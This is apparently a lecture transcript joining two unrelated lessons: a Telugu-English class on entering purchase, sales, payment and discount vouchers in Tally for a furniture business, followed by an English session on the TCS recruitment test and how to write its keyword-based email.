డేట్ అన్నమాట. ఓకే. ఇక్కడ ఏదైతే మీకు డేట్ కనపడుతుందో అది బిల్ డేట్ అనమాట. సో ఈ రెండు ఎందుకు ఇచ్చాడు అంటే, ఇదేమో మనం ఏ రోజు ఎంట్రీ చేస్తున్నాము. ఫర్ ఎగ్జాంపుల్ మనము ఒక డిఫరెంట్ డిస్టిక్, ఒక వేరే డిస్టిక్ నుండి కానీ వేరే స్టేట్ నుండి కానీ మనం పర్చేస్ చేసాము. ఓకే. సపోజ్ వీఆర్ గెట్టింగ్ మెటీరియల్ ఫ్రమ్ బెంగళూరు. ఓకే. సో బెంగళూరులో ఒకటే రోజులో రీచ్ అవ్వవు కదా మన స్టాక్. సో బెంగళూరుకు 2 days, మ్యాక్సిమం 2 days or మ్యాక్సిమం 3 days స్టాక్ రీచ్ అవుతుంది. సో తను ఏ రోజు చేస్తాడు, మనం ఏదైతే ఆర్డర్ పెట్టామో ఆ ఆర్డర్ని బేస్ చేసుకొని ఆ రోజు డిస్పాచ్ చేస్తాడు. అంటే సపోజ్ హీఈస్ డిస్పాచింగ్ మెటీరియల్ ఆన్ 1st April, బట్ వీ రిసీవ్ స్టాక్ ఆన్ 3rd April. రైట్. సో మనం ఎప్పుడు ఎంట్రీ చేస్తాము, 3rd April రోజు ఎంట్రీ చేస్తాం. సో 3rd April ఇక్కడ ఉంటుంది, బట్ బిల్ ఏ రోజు చేశాడు తను, 1st Aprilకి చేశాడు. సో ఆల్రెడీ ఎంట్రీ డేట్ కన్నా ఇది ముందు ఉండాలి, ఎంట్రీ డేట్ కన్నా తర్వాత ఉంటే తీసుకోదు. అంటే ఎంట్రీ డేట్ ఏప్రిల్ ఉండి బిల్ డేట్ 2nd April ఎట్లా ఉంటుంది, ఛాన్స్ లేదు కదా. అంటే మనం ఎంట్రీ చేస్తుందేమో 1st April, కానీ బిల్ డేట్ ఏమో 1st April కన్నా ముందు ఉంటుంది, కానీ 1st April తర్వాత ఉండదు. అంతేనా. ఫర్ ఎగ్జాంపుల్ ఐఎమ్ టేకింగ్ ఎస్ టు 2nd April. సి ఇట్ ఈస్ నాట్ టేకింగ్, ద స్క్రీన్ ఈస్ నాట్ యాక్సెప్టెడ్. ఐఎమ్ టేకింగ్ 1st April, it is accepting. ఐఎమ్ టేకింగ్ ఆన్ 31st March also it is accepted. 31st March 18 it is accepting, బికాస్ మన ఎంట్రీ డేట్ ఏమో 1st April ఉంది, కానీ బిల్ డేట్ ఏమో 31st March ఉంది. ఇట్ ఈస్ పాసిబుల్. అంటే 31st రోజు తను మనకి మెటీరియల్ పంపించాడు, మనం దాన్ని 1st Aprilకి ఎంట్రీ చేసాం. ఇట్ ఈస్ పాసిబుల్. కానీ ఇట్లా పాసిబుల్ ఉంటుందా మనకేమన్నా? ఏప్రిల్లోనేమో మనము మెటీరియల్ తెచ్చుకొని 2nd Aprilకి బిల్లింగ్ చేయడానికి పాసిబిలిటీ ఉండదు కదా. సో అందు గురించి ఈ రెండు ఇచ్చాడు అనమాట. సో ద రైట్ కార్నర్ వాట్ ఎవర్ సీయింగ్ హియర్, దట్ ఈస్ ఎంట్రీ డేట్. whatever the date you are seeing here is bill date. Okay. Party name, ఎవరి దగ్గర కొన్నాము, గోద్రేజ్. సెలెక్ట్ గోద్రేజ్. సో ఇక్కడ డీటెయిల్స్ అన్ని ఇస్తామంట. ఆర్డర్ ఏమన్నా ఆర్డర్ ఉంటే ఆర్డర్ రిఫరెన్స్ నెంబర్. ఓకే. సప్లై అడ్రసెస్, మీరు గోద్రేజ్కి ఆల్రెడీ సప్లై ఆర్డర్ ఇచ్చి ఉంటే ఆర్డర్ ఆటోమేటిక్గా అడ్రస్ అన్నీ వచ్చేస్తుంది అనమాట ఇక్కడ. ఓకే. పర్చేజ్ అకౌంట్, పర్చేజ్ నేమ్ ఆఫ్ ద ఐటమ్, వాట్ ఎవర్ పర్చేసింగ్, అల్మారా. ఓకే. సో ఇక్కడ ట్రాకింగ్ నెంబర్ ఏమైనా వస్తే నాట్ అప్లికబుల్ అని పెట్టేసండి. నాట్ అప్లికబుల్. క్వాంటిటీ, వాట్ ఈస్ ద క్వాంటిటీ ఇస్ 10. ఓకే. వాట్ ఈస్ 2500. ఓకే. రైట్. సో ఇంకొకటి మళ్ళీ నెక్స్ట్ ఐటమ్ ఉంది, అల్మారా, చైర్స్ ఉంది. ఇప్పుడు చైర్స్ అని కొట్టంగానే నాకు ఇంకో స్క్రీన్లోకి వెళ్తుంది. ఈ స్క్రీన్ ఎందుకు వెళ్తుంది, ట్రాకింగ్ నెంబర్ అని ఎందుకు ఉంది, ఇవన్నీ ఎందుకు వస్తున్నాయంటే ఇక్కడ F9 ఫీచర్స్లో F9 ఫీచర్ మనకి సేల్స్ ఆర్డర్స్, పర్చేస్ ఆర్డర్స్ అనేది ఎస్ ఉంది. ఆ సేల్స్ ఆర్డర్స్, పర్చేస్ ఆర్డర్ ఉన్నప్పుడు
కంపల్సరీ ఆర్డర్ అగెనెస్ట్గా మనకు వస్తుంది కాబట్టి అది మనకి ఆర్డర్ అడుగుతుంది అనమాట. సో టాలీ విల్ బీ ఆస్కింగ్ ఫర్ ఆర్డర్ డీటెయిల్స్ బికాజ్ యూ హ్యావ్ యాక్టివేటెడ్ హియర్ ఆర్డర్స్. సో against that order you are getting the material. So that is the reason whenever you are selecting the item it is asking for order. See now I have deactivated that order. So rightly now you can see that the cursor is going to quantity and rate column, right. Chairs, the 250, rate is also 250, right. So ఇందాక మీరు అబ్జర్వ్ చేసినట్టయితే మనము ఎప్పుడైతే క్వాంటిటీ సెలెక్ట్ చేసుకుంటామో క్వాంటిటీ సెలెక్ట్ చేసుకోగానే అది ఇంకొక స్క్రీన్లోకి వెళ్ళేసి అది ఏ ఆర్డర్ అగెనెస్ట్గా వచ్చిందని డీటెయిల్స్ అడిగింది. ఎందుకు అడిగింది అంటే మనము ఏం చేస్తాము ఇక్కడ ఆర్డర్ డీటెయిల్స్ యాక్టివేట్ చేసాం కాబట్టి అడుగుతుంది. ఇప్పుడు దాన్ని డీయాక్టివేట్ చేశాను నేను. సో ఆ సేల్స్ ఆర్డర్ పర్చేస్ ఆర్డర్ మన సపరేట్ క్లాస్ ఉంటుంది, అక్కడ మనం డిస్కస్ చేస్తాం వీటి గురించి. ఓకేనా. నో టేబుల్స్, వాట్ ఈస్ 25, అమౌంట్ ఈస్ 5000. ఓకే. సో 2,12,500 is the total amount. సో దీనికి వల్ల అడిషనల్ మీకు ఏమైనా ట్రాన్స్పోర్టేషన్ పర్చేజెస్ సేల్స్ అవి ఉంటే కూడా యాడ్ చేసుకోవచ్చు లేదా సపరేట్గా చేసుకోవచ్చు. సో ద అడిషనల్ ఎక్స్పెన్సెస్ ఆన్ యువర్ ఇన్వాయిసెస్ సేల్స్ అండ్ పర్చేజెస్ ఆల్సో వీ హ్యావ్ సపరేట్ క్లాస్ ఫర్ దట్, వీఆర్ గోయింగ్ టు సీ ఆన్ దట్. ఓకే. ఇఫ్ యూ వాంట్ యూ కెన్ రైట్ బీన్ గూడ్స్ పర్చేజ్డ్ ఫ్రమ్ గోద్రేజ్. ఓకేనా. బిల్ నంబర్ వైడ్ bill number, okay, something rasi. Okay, this is first. Second one is Bantia furniture, reference number is 105. So reference number is 105, party name is Bantia furniture, purchases, name of the item is sofa set, 5 numbers we have purchased, rate is 5000, right. Next one is sofa set, center table, the next item is center table 10, 2500. Okay. The third one is display table 5, 3500, 67,500. Next 98, party name is Raj Furnitures, purchase account, item is bookshelf, quantity is 15, 3500. Again writing table, quantity is 100, 500, sorry 500. Okay, writing pad shades 250, 300, 250, 300. So 1,77,500. Okay. So now sales is completed, purchase is completed, sorry purchase is completed. Now we are going to have the sales also. Sales he is giving. So reference number 1 means 1 invoice and reference number 1. So if I go to F8 sales, reference number is 1. Okay, oka reference number undante adi oka invoice ani ardham anamata. So party name is cash. Okay, if you write here you can have the party name, Mr. Kumar, you can write Kumar account. Okay. Sales, name of the item almara. Okay, quantity enni konnadu 2, rate enta 3750, right. Katam, sorry this is right. Now invoice number 1 is complete. Now invoice number 2. Okay, invoice number 2, party name is cash. Okay, item whatever selling chairs, any 15 number chairs ammamu enta 400, 6000. Next is cash, sorry tarvata table ammamu, table any 5, 6,250. Okay, next Z solutions, select the party name Z solutions. Amount Z solutions ki almara amount 5, 3,500. Mali chairs 50,
350 టేబుల్ 5. సో ఇప్పుడు అబ్జర్వ్ చేస్తే 6215 ఆటోమేటిక్ ఎందుకు వచ్చింది? ఎందుకంటే టాలీ ఏం చేస్తుందంటే ప్రీవియస్గా ఉన్న దేనికి అంటే ఎంత రేట్కి అయితే సేల్ చేస్తామో అది ఆటోమేటిక్గా వచ్చేస్తుంది. సో ఇక్కడ అబ్జర్వ్ చేసినట్టయితే ప్రీవియస్గా మనము చైర్ని టేబుల్ని టేబుల్ని 6250కి అమ్మాము. సో అందుకని లాస్ట్ ప్రైస్ 6250 ఉంది కాబట్టి ఆటోమేటెడ్ టాలీలో 6250 వచ్చేస్తుంది అనమాట. సో 65,000. So it is 6,000. Go and change for 6,000. Next one is again party name cash. Sofa set 3, 6,500. Center table 8, 4,000. Display table 3, 5,000. 66,500. Okay, right? So we have done with sale. Now sixth one is RRD college. We are selling to RRD college. Sales. RRD college ki bookshelf 14 mm 4,500. Next writing table 75. రేట్ రాలేదు ఎందుకంటే అంతకుముందు మనం ఏం అమ్మలేదు కాబట్టి రేట్ రాలేదు. రైటింగ్ ప్యాడ్ చైర్స్ 225, 225, 450. నెక్స్ట్ చైర్స్ 150, 350 వచ్చింది ఎందుకంటే ఆల్రెడీ ఆ రేట్ కమ్మాం కాబట్టి. నెక్స్ట్ టేబుల్స్ 15, 6,000. So 3,78,000, right? So 3,78,000 we have done. This is your invoice, right? సో మళ్ళీ ఇదే మీకు ప్రింట్ కావాలంటే సో ప్రీవియస్ ఏమైనా కావాలంటే పేజ్ అప్ కొడితేసి వచ్చేస్తుంది. సో ఆల్ టు పీ కొడితే విత్ ప్రివ్యూ అని సెలెక్ట్ చేసుకోండి, రైట్. సో దిస్ ఇస్ అ టాలీ ఫార్మాట్. దిస్ ఈస్ ద ఇన్వాయిస్ జనరేటర్ ఫర్ టాలీ ఫార్మాట్. సో ఇది జస్ట్ మీకు మా నార్మల్గా చూపించే ఫార్మాట్. ఇందులో అడిషనల్గా జిఎస్టీ వచ్చినప్పుడు ఇంకా మీకు ఇంకా చాలా బాగా అర్థమవుతుంది ఎందుకంటే దిస్ ఇస్ ద ఇన్వాయిస్ వితౌట్ జిఎస్టీ. నౌ వీ హ్యావ్ టు మేక్ ద ఇన్వాయిస్ విత్ జిఎస్టీ. ఆ జిఎస్టీలో మళ్ళీ అడిషనల్ ఛార్జెస్ ఉంటే ఎలా చేయాలి, రేట్ కాలం కావాలంటే ఏం చేయాలి, బ్యాంక్ కాలమ్స్ కానీ. సో ఇవన్నీ మనము ఇంకా పర్టికులర్ ఫర్దర్ క్లాసెస్లో ఇన్ డెప్త్గా వెళ్దాం. సో యాజ్ ఆఫ్ నౌ వీఆర్ గోయింగ్ టు హ్యావ్ దిస్ టైప్ ఆఫ్ invoice. Okay, the next one is cash paid toward transportation and purchase paid. Okay, FI payment, cash, transportation on purchases. Transportation on purchases anta 2,500 khatam అయిపోయింది. నెక్స్ట్ ట్రాన్స్పోర్టేషన్ ఆన్ సేల్స్ 1,500, cash on sales amount is 1,500. Okay, నెక్స్ట్ వన్ చెక్ రిసీవ్డ్ ఫ్రమ్ జీ సొల్యూషన్ F6 చెక్ అన్నాడు. సో కెనరా బ్యాంక్ సెలెక్ట్ చేసుకున్నాము. ఓకే, జీ సొల్యూషన్స్ ఎంత ఇచ్చాడు, 65,000 ఇచ్చాడు. ఓకే, సో అగైన్స్ రిఫరెన్స్ వస్తే సెలెక్ట్ చేసుకోండి. ఓకే, సో స్టూడెంట్స్ మీకు అగైన్స్ రిఫరెన్స్ ఇక్కడ వచ్చింది, సెలెక్ట్ చేసుకోండి. వెన్ యూఆర్ ప్రాక్టీసింగ్ ఇఫ్ యూఆర్ గెటింగ్ ఎనీథింగ్ దెన్ యూ కెన్ గో ఫర్ ఆన్ అకౌంట్ ఆల్సో. ఓకే, సో ఈ అగైన్స్ రిఫరెన్స్, ఈ అడ్వాన్స్, ఇవన్నీ మనకి బిల్స్ పేయబుల్ రిసీవబుల్స్ క్లాస్ ఉంటుంది, దానిలో మనం చెక్ చేస్తాం. ఓకేనా, రైట్. క్యాష్ పేడ్ టువర్డ్స్ ట్రాన్స్పోర్టేషన్ ఆన్ పర్చేజెస్ FI, క్యాష్ పేడ్ టువర్డ్స్ ట్రాన్స్పోర్టేషన్ ఆన్ పర్చేజెస్, ట్రాన్స్పోర్టేషన్ ఆన్ పర్చేజ్ 3,500. మళ్ళీ క్యాష్ పెట్టి ట్రాన్స్పోర్టేషన్ ఆన్ సేల్స్ 1,900. ఇక్కడ ఇది జాగ్రత్త ఉండండి. చెక్ ఇష్యూ టు బాంటియా ఫర్నిచర్ 65,000, బ్యాలెన్స్ డిస్కౌంట్ రిసీవ్డ్. సో బ్యాలెన్స్ అంటే బాంటియా, చెక్ ఇష్యూ టు బాంటియా ఫర్నిచర్. సో యాక్చువల్లీ బాంటియా ఫర్నిచర్కి మనం ఎంత పే చేయాలి, బాంటియా ఫర్నిచర్ వీ హ్యావ్ టు పే 67,500.
కానీ మనం ఇక్కడ ఎంత పే చేస్తున్నాము, 65,000 పే చేస్తున్నాము. అంటే ఇంకా బ్యాలెన్స్ 2,500 is discount received. Okay, so here in this situation you have to post 2 entries, that is first payment. Okay, Canara Bank Bantia Furniture, so enta pay is 65,000. Okay, 65,000. Balance is discount annadu, avuna. So discount is an adjustment entry, right? So we have to go for F7 journal. Okay, what is debit? Debit is Bantia Furniture 2,500. Okay, credit is what? Discount received 2,500. Been discount received. Okay, right. Cash paid towards transportation on purchases, FI payment, cash, transportation on purchases, transportation purchases 2,000. Okay, but transportation on sales, amount and the transportation on sales 1,000. Next, check received from RRD College. Okay, F6 receipt, Canara Bank, RRD College. So 3 lakh RRD College నుంచి ఎంత రావాలి, యాక్చువల్గా మనకి RRD College 3,78,000 రావాలి, బట్ 3 lakhs మనకి వచ్చింది, 3,70,000 వచ్చింది, ఇంకా 8,000 ఇస్ డిస్కౌంట్. సో 3,70,000. Okay, balance is discount, F7 journal. Okay, here RRD College is should be discount allowed should be debited, that is 8,000. Okay, discount RRD College should be credited. Okay, next, check issued to Godrej, nothing adjustment, FI payment, Canara Bank, check issued to Godrej, enta 2,12,500. Okay, next, check issued to Raj Furniture, balance discount, Raj Furniture check issued annam, Canara Bank. Okay, Raj Furniture. So మొత్తం యాక్చువల్ రాజ్ ఫర్నిచర్కి ఇందాక మనం ఏం చేసాము, 1,75,000 ఒక ఎంట్రీ వేసి డిస్కౌంట్ ఇంకొక ఎంట్రీ చేస్తాం. సో అలా కాకుండా కూడా మనం ఒకటే ఓచర్లో కూడా డిస్కౌంట్ ఎంట్రీ పాస్ చేయాలి, అదే ఓచర్లో పేమెంట్ ఎంట్రీ 2 పాస్. బట్ ఇది ఎప్పుడు యూస్ చేయాలి అంటే టోటల్ బిల్ సెటిల్మెంట్. అంటే ఫర్ ఎగ్జాంపుల్ 1 lakhs అయింది, ఇప్పుడు ఇదే ఇన్వాయిస్ చూస్తున్నట్టయితే రాజ్ ఫర్నిచర్కి మనం ఎంత పే చేయాలి, 1,77,500, దానికి 1,75,000 పే చేస్తారు, అంటే ఆ బిల్ సెటిల్మెంట్ కంప్లీట్గా అయిపోయింది. సో అలాంటి అప్పుడు మాత్రమే ఇది యూజ్ చేస్తే కరెక్ట్ అనమాట. సో రాజ్ ఫర్నిచర్ ఎంత పే చేయాలి, 1,77,500 పే చేయాలి, అవునా. సో దానికి ఏం చేస్తున్నారు అన్న, డిస్కౌంట్ పే, మనకి ఇక్కడ ఏమవుతుంది, డిస్కౌంట్ పే చేస్తాం, సారీ వీఆర్ పేయింగ్ హిమ్, సో విల్ రిసీవ్ ద డిస్కౌంట్, రైట్. సో డిస్కౌంట్ రిసీవ్డ్ అని సెలెక్ట్ చేసుకొని మైనస్ చేయండి, -2,500. ఓకే, క్లియరా. సో ఈ విధంగా మీరు పోస్ట్, అంటే ఒకటే ఎంట్రీలు ఇలా కూడా చేయొచ్చు అనమాట. బట్ ఇది అంటే ఒక డిస్కౌంట్ ఎంట్రీ, పేమెంట్ ఎంట్రీ ఒకటే దానిలో పోస్ట్ చేయాలి అంటే ఆ టోటల్ బిల్ సెటిల్మెంట్ ఉండాలి. అంటే టోటల్ ఇన్వాయిస్ 1,77,500, దానిలో 2,500 డిస్కౌంట్. సో టోటల్ ఉంది కాబట్టి పోస్ట్ చేయడానికి ఛాన్స్ ఉంటుంది. మీరు సపరేట్గా ఉన్నప్పుడు అంటే చేసే కొంచెం కన్ఫ్యూజన్ ఉంటుంది. ఓకే, సో బెటర్ 2 entries can be 2 discount entry and payment can be done only in 1 entry when the settlement is full. Okay, paid for salaries, cash salaries, amount 10,000. Okay, next, tea and snacks, cash, staff welfare. What is the amount staff welfare? 2,500. Next, Shriram Chit Fund loans, Canara Bank, Shriram Chit Fund loans, enta pay chestam, 2,50,000. Sorry, 2,50,000. Okay, next, cash paid towards daily newspaper, cash daily newspaper books and periodicals and create chesamu, so 150 is the amount. Okay,
So, students, we have done all the entries. Now, let's check the transactions. So, first I am going to profit and loss account, press Alt F1. See, you can see the gross profit 1,50,500. You can see the net profit 125,450. You can see the closing stock 61,750, 61,750, right? In balance sheet, come to balance sheet, press Alt F1 for full details. Here also you can see, okay, cash in hands, okay, bank account, cash account. So, cash account balance ఎక్కువ ఎందుకు వచ్చింది something. So, already college I have done with the cash. So, it is bank, Canara Bank. Okay. Now, you can see the cash balance. Cash in hand is 236,700, 236,700. Bank accounts 4,82,500, 4,82,500. So, this is the things we have done, right? Students, we have seen the total problem, right? అంటే ఒక కంప్లీట్గా మనం ప్రాబ్లం చెక్ చేసాము. అంటే గణపతి ఫర్నిచర్స్ ఒక ఫర్నిచర్ బిజినెస్ అనమాట. తన బిజినెస్లో నుండి మనం ఏమైతే చేసామంటే తన బిజినెస్లో ఫర్నిచర్స్ అమ్ముతాడు. సో ఫర్నిచర్ బిజినెస్ నథింగ్ బట్ చైర్స్, టేబుల్స్, ఇవన్నీ మనకి ఫర్నిచర్స్ సంబంధించినవి. ఆ బిజినెస్ ఒక ప్రాబ్లం తీసుకున్నాము. ఇందులో మీకు మనం ఇన్వెంటరీ చేసాము, ఓకేనా. అలా ఒక సింపుల్ మోడల్ సేల్స్ ఇన్వాయిస్ కూడా చూపించాను మీకు ఎలా ఉంటుంది ప్రివ్యూ అనేది, ఓకే. సో బ్యాలెన్స్ షీట్లో మనకి ఏవైతే ఆన్సర్స్ ఇచ్చాడో ఆ ఆన్సర్స్ కూడా మీకు కరెక్ట్గా చూపించాను, ఓకే. సో డిస్కౌంట్ ఎంట్రీ అంటే ఒక ట్రాన్సాక్షన్లో డిస్కౌంట్ కూడా ఉంటే డిఫరెంట్గా ఎలా చేయాలి అంటే పేమెంట్ సపరేట్గా, డిస్కౌంట్ సపరేట్గా ఎలా పాస్ చేయాలి త్రూ జర్నల్ వాచర్ అది చూపించాను. అలాగే ఇప్పుడు 2 ఎంట్రీస్ పాస్ చేసే బదులు మనకి అంటే అనవసరంగా ఒక వోచర్ టైం వేస్ట్ వోచర్ ఎంట్రీ చేయాలి, ఓకేనా. సో దాన్ని మళ్ళీ ప్రింట్ తీయాలి. సో టు సేవ్ ద స్టేషనరీ, టు సేవ్ ద టైమ్ వర్క్, సో హౌ టు డూ ద పేమెంట్ అండ్ డిస్కౌంట్ ఎంట్రీ ఆర్ రిసీట్ ఆర్ డిస్కౌంట్ ఎంట్రీ వన్ ఇన్వాయిస్ ఆల్సో ఇన్ వన్ వాచర్ ఆల్సో ఐ హ్యావ్ షోడ్ యూ. సో మీరు అప్పుడప్పుడు అబ్జర్వ్ చేసి ఉండాలి, రాసి ఉంటే అమౌంట్ ఇంత మైనస్ డిస్కౌంట్ అని రాసేసి మనకి పేమెంట్ చేస్తాం. సో అదే విధంగా మన వోచర్లో కూడా చేయొచ్చు. బట్ ఇది ఎప్పుడు యూస్ చేస్తామంటే ద సెటిల్మెంట్ షుడ్ బి ఫుల్. అంటే ఇప్పుడు 1 lakh బిల్ అమౌంట్ 1 lakh ఉంది, ఆ 1 lakhకి 95,000 వచ్చింది, 5,000 ఇంకా మొత్తం డిస్కౌంట్ అని కరెక్ట్గా తెలిసినప్పుడు మనం పాస్ చేయొచ్చు ఎంట్రీ. సో ఒకసారి ఈ 1 lakhకి ఒకసారి 20,000 ఇచ్చి ఒకసారి 30,000 ఇచ్చి అట్లా అయినప్పుడు కొంచెం చేయడం కొంచెం కష్టం అవుతుంది. సో ట్రాకింగ్ విల్ బి డిఫికల్ట్. సో అందుకే అలాంటి సిచ్యుయేషన్ అంటే ఒకటే బిల్ అప్పుడే పేమెంట్ ఇచ్చేస్తేనేమో ఒకటే వోచర్లో చేయొచ్చు. బట్ ఆ 1 lakh బిల్నే ఒకసారి 30,000 ఇచ్చి ఒకసారి 25,000 ఇచ్చి ఒకటి పార్ట్లో పేమెంట్ ఇచ్చినప్పుడు మీరు కొంచెం డిస్కౌంట్ చేయడం ప్రాబ్లం అవుతుంది. సో ఇన్ దట్ సిచ్యుయేషన్ ప్లీజ్ డోంట్ గో ఫర్ ద సింగిల్ వోచర్, okay, you can go for general voucher. So in today's class we have seen all these types of solutions with inventory, okay. In tomorrow's class we are going to see some other classes like how to make the sales invoices, sales orders, purchase orders, etc. Okay, after completing some reports we are going to come with the GST classes also. So students, for today have a nice day. Tomorrow we will meet in the next class. Hello everyone, welcome to today's session for TCS pattern. We are continuing to talk about the TCS selection process. Like I had been repeating, I'm going to talk about it again in terms of the entire pattern. So we have TCS recruitment drive that's going to happen very soon across certain cities and districts in AP. So the selection process is divided into 2 stages. The first stage is the online written assessment. The second stage is interview round. Now this is a progressive selection process, which means you need to clear the online assessment in order to go to the interview segment or interview stage. So interview stage will have 2 segments. One is HR interview and one is technical round.
and the online assessment will have 4 different categories. These categories are: there is an email which you need to write, then there is quantitative aptitude, which is a multiple choice question. You will have 20 questions that needs to be answered in 40 minutes. You will have multiple choice question for C program language, 10 such questions with a time limit of 20 minutes. And then you will have a coding test. You need to write a code based on the question, according to the question. Only one such program you need to write, with the permitted time being 20 minutes. The extreme right column says number of star mark questions. In quantitative aptitude, you will have 2 questions which will be marked as star. What it means is, in quantitative aptitude, there is negative marking for every single question. Every time you give a wrong answer, you will lose 0.33% of the marks allocated for that particular question. However, the star mark questions, the negative points will double up, which means instead of losing 0.33%, you will lose 0.66%. But the positive aspect is, if you answer this question correctly, you will also score double the points, which means 2 star mark questions. If the answer is correct, you will score double. If the answer is incorrect, you will lose double the negative marking. So you got to be very careful for these 2 questions. The topics that will be covered for quantitative aptitude is probability, permutation and combination, time and distance, time and work, equations, ratios and proportions, allegations or mixtures, series and progression, average, percentage profit and loss, problems on ages, areas, shapes and perimeter, number system, HCF and LCM, and reasoning. Now, as far as email is concerned, your email question will look something like this. This is a sample email which we are going to practice today. The question is mentioned in terms of a scenario, and you need to write an email keeping in mind the outline. The outline basically means the keywords that needs to be used in the entire email. There are certain rules. For example, all the keywords has to be used in the email. The format of the keyword cannot change, which means the first keyword you have here is housing loan. It cannot be house loan. Account cannot be accounting. Okay. Branch cannot be branches. So you have to use the exact word which is mentioned in the outline. Besides this, there will be certain other rules which will be mentioned on the email itself. For example, let me show you the sample here. It is compulsory to use all the specific words mentioned in the outline in your email. You can add other sentences of your choice. The name of the sender and receiver should be as given. Every email will have a name of a sender and receiver. For example, in this question, the receiver is Mr. Kiran Kumar, who is the bank manager of Andhra Bank. The sender's name is Anil. So you need to maintain this. You cannot go wrong with that. The email must contain a minimum of 50 words. If you use below number of 50 words, you will be disqualified. It should be over and above the number of words. That's why it says minimum. The outline is, if the outline is strictly not followed, which means if you miss any of the keyword, if you make any spelling mistakes, grammatical mistakes or punctuation mistakes in the email, you will lose points. To make it easy, I have put together a list of do's and don'ts for the email. So let's go through this. Read the topic carefully. Read and understand the keywords or key phrases mentioned. Use each and every keyword or phrases mentioned. Even if you miss one of the keyword or phrases, the email will be invalid. Ensure the keywords are used in the same form as mentioned in the topic, which means buy cannot be changed into bought. Keywords should be mentioned in the sequence as mentioned in the topic. Start a new paragraph for change of a thought group, and every new paragraph should start with a fresh line. Next set of do's: entire email should be left indent. Do not leave a gap on the left when you start a new paragraph. Use the receiver's name and the sender's name as mentioned in the topic. Always end your email with salutation and start your email with greeting. Use a hello
or dear or respected. There should be a salutation in the end, closing in the end, thanks and regards or just regards or thanks. Ensure the email is written within 10 minutes. Now this is important. The time limit is 10 minutes. If you submit the email at the 10th minute mark, you may not be able to submit. If you exceed the 10 minutes, you may not be able to submit. So please submit it before 10 minutes. And the word count should be over and above what is mentioned in the instruction. Now here are the don'ts. Do not miss even a single keyword or phrase. Do not change the tense or the verb form of the keyword. Do not address the email as hi. Do not make any spelling mistakes, grammatical mistakes or punctuation mistakes. Do not exceed the 10-minute mark. Do not write the email below the number of words given in the instruction. Okay. Now here is the question again. As a loanee is a person who's taking the loan. Write an email. As a loanee, write an email to the bank manager of Andhra Bank, Mr. Kiran Kumar, requesting him to start ECS, which means Electronic Clearing Services, for paying the monthly installments of your housing loan. Sign off the email as Anil. Now ECS basically means every month you don't have to go to the bank, you can give an instruction, it's called a standing instruction. Once it's approved, the amount will be automatically debited from your account and it will be credited to the loan account. So you want to avail for this service. So basically you don't have to go to the bank every month. The keywords that you need to mention are housing loan, account, monthly installments, branch, travel, challenge, miss, penalty, electronic clearing services, easy, hassle-free, anytime, schedule, request, initiate. Okay. Now let me show you how to write this email. Now I'm starting the email with hello Mr. Anil Kumar. I can use the full name or I can just say hello Mr. Kumar. Please remember, when I'm using a title is Mr., Miss, Doctor, Professor, DOC for Doctor, PROF for Professor. So when I use a title, I need to use a full stop and there should be a space after that. That's a rule. After writing the greeting, I should not be using a comma. That's not needed. I'll go to the next line and my email should have 3 blocks. The first one is introduction, the second one is the body, and the third one is a summary. Okay. And when I start a new paragraph, it should start with a new line and I should not leave a gap in the left. What do I mean by that? Let me show you. Okay. Now a lot of people make a mistake, they leave a gap like this. This is incorrect. The entire email should be left indent. So please don't leave a gap there. I would like to make a request about my housing loan. Housing loan account or housing loan I have availed from your bank. Okay. Next paragraph. This is introduction.
Okay. Now the question says Mr. Kiran Kumar and the sender is Anil, but I made a mistake here. It should be Kiran Kumar. Okay. Now the rule says it should be a minimum of 50 words. So let's quickly check if I've used 50 words. It says 114 words, which is absolutely fine. Secondly, the entire email is left indent. Third, I have the introduction, I have the main body, and then I have the summary. I have the closing, I have the greeting here, everything is fine. Now I need to check if I've used all the keywords. The first one is housing loan. Second one, account. Third, monthly installments. Fourth, branch. Then travel. Challenge. Miss. Penalty. Electronic clearing services. Easy. Hassle free. Hassle free means trouble free. Anytime. Schedule. Request and initiate. This is request, then I have initiate. So I have used all the keywords. Secondly, I have used more than 50 words. Now let's quickly check the punctuation. I'm going to zoom in to show you what are the points you need to take care of. So after full stop there should be a space. Now I started a new paragraph in a new line. Every time I use a full stop, the next word should start with a capital letter. And if I use a comma, there should be space after the comma, not before. So the space should be after the comma. Please keep that in mind. Okay? Kindly accept my request and initiate the process. Then closing regards, I don't have to use a comma there. This is not needed, and the name which is mentioned in the topic. So here is my entire email, and I've written within 10 minutes. I've also checked it meets all the criteria. Okay. So email is the section where a lot of students have failed in the past, and these emails are very, very easy. If you pay attention, if you practice a lot, these emails will be very easy for you. So I'm going to prepare one more question for you right away. So this will be a new question which I am preparing for you, and I would request you to write the email so that you can practice.
Okay, as a fresher, write an email to the HR manager, Miss Pooja Verma, in Tata Consultancy Services, seeking any open position in the organization. Sign off the email with your name. Now I am going to write the keywords. These are going to be the keyword. I hope this is visible to all of you. Okay. So here is the question. Let me increase this font size. The email is, as a fresher, write an email to the HR manager, Ms. Pooja Verma, in Tata Consultancy Services, seeking any open position in the organization. Sign off the email with your name. The keywords: graduated, BSc, specialization, university, keen, aspire, career, internship, full-time, platform. Okay, these are the keywords. So you need to write an email. Please make sure all the keywords are used and the email has minimum of 60 words, 60. I'm going to pause here so that you can make a note of this. Then I'll quickly check the YouTube video if anybody has any questions. So please make a note of this. So those who are watching on YouTube, you can post your question here. So you can post your questions here, okay? All right, let me begin. So these are the 10 keywords you will have to use. I'm going to put this here so that's easier for me to copy. Okay, I hope this is clearly visible now for everybody.
All right, let's begin.